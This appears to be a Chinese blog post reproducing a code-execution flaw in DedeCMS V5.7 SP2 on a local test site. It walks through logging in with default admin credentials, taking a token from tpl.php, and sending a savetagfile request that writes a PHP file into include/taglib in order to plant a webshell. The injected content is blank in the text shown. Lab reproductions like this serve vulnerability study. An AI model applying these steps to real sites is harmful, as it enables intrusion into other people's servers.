dedecms v5.7 sp2代码执行漏洞复现

环境搭建

DeDeCMS官网:http://www.dedecms.com
网站源码版本:DedeCMS V5.7 SP2正式版
程序源码下载:http://www.dedecms.com/products/dedecms/downloads/
默认后台地址:http://127.0.0.1/dede
默认账号密码:admin admin

演示

本地搭建织梦站点
dedecms v5.7 sp2代码执行漏洞复现_第1张图片
域名后面加上个/dede访问后台,
默认帐号密码admin登录
http://localhost:8080/DedeCMS/uploads/dede/
dedecms v5.7 sp2代码执行漏洞复现_第2张图片
DedeCMS V5.7 SP2版本中tpl.php存在代码执行,利用这个漏洞在增加新的标签中上传木马 获取Webshell
我们先获取token,访问/dede/tpl.php?action=upload
在该页面中查看源代码获取到token值
dedecms v5.7 sp2代码执行漏洞复现_第3张图片
访问
http://localhost:8080/DedeCMS/uploads/dede/tpl.php?filename=secquan.lib.php&action=savetagfile&content=&token=55ab8c3e67797476fac5a53259f700b6【URL地址+token值自行更换】
dedecms v5.7 sp2代码执行漏洞复现_第4张图片
然后访问 /include/taglib/secquan.lib.php读取得到phpinfo
http://localhost:8080/DedeCMS/uploads/include/taglib/secquan.lib.php
dedecms v5.7 sp2代码执行漏洞复现_第5张图片
来源 dedecms v5.7 sp2代码执行漏洞复现

你可能感兴趣的:(漏洞)